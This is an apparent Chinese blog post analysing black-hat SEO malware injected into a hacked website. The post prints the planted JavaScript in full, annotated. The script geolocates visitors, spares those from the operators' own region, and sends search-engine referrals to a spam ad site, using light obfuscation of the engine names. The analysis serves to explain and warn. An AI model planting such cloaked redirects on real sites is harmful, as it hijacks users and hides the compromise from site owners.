發現一波黒帽seo神操作,通過百度打開跳廣告,其他方式訪問正常。下面分析原理。
阿新 • • 發佈:2017-11-24
排名 javascrip 別人 訪問 廣告 簡單 方式 jsonp onload
朋友網站被黑了,但是不是低級黑,雖然最後發現原理很簡單,但是對於普通seo來說還是有些奇妙哦。而且不影響收錄和排名,站長只管優化,黒帽偷偷得利!
情況是在百度打開收錄的頁面,打開後,會跳到別人的垃圾廣告網站。
直接打開,或者在網站運營地區打開就是正常訪問。
這波操作讓當事人懵逼啊,只能靠客戶反映。
我得知此事後初步判斷是被植入了惡意代碼加了判斷。
在v站請教了大佬們後,得到了證實,還幫我找到了植入點,真是給力啊。
這是通過引入js來實現的。
下面我們來剖析下這技術簡單但是微妙的操作吧。
當然這只是黒帽seo的冰山一角啦
(function() { var JSONP=document.createElement("script"); JSONP.type="text/javascript"; JSONP.src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js"; 這裏還用了新浪的api來判斷城市 document.getElementsByTagName("head")[0].appendChild(JSONP); JSONP.onload = function() { var provinces = [‘\u5c71\u4e1c‘]; 山東、說明是不想讓山東的運營發現var provinces1 = [‘\u6ed5\u5dde‘]; 滕州 for(var i in provinces) { if(remote_ip_info.province != provinces[i] && remote_ip_info.city != provinces1[i]) { remote_ip_info這個是從新浪api得到的 excute(); 如果不是運營地區就跳廣告 } } } function excute() { 廣告函數var ref=document.referrer; // referrer 方法用來判斷上一個網頁的url,沒有返回null var ba="ba"; // 這個操作估計是為了不讓搜索引擎發現吧 ba = ba + "idu"; var so="so"; so = so + "gou"; var s="s"; s = s + "o"; var go="go"; go = s + "m"; nam = ""; if(ref.indexOf(ba)>0||ref.indexOf(so)>0||ref.indexOf(s)>0||ref.indexOf(go)>0) 判斷是不是搜索引擎過來的 { window.location.href="http://垃圾網站。com"; 跳垃圾網站 } } })()
但是這種問題都是因為服務器安全不到位,被黑客獲取權限,實施了惡意植入。
所以網站安全是非常主要的。
發現一波黒帽seo神操作,通過百度打開跳廣告,其他方式訪問正常。下面分析原理。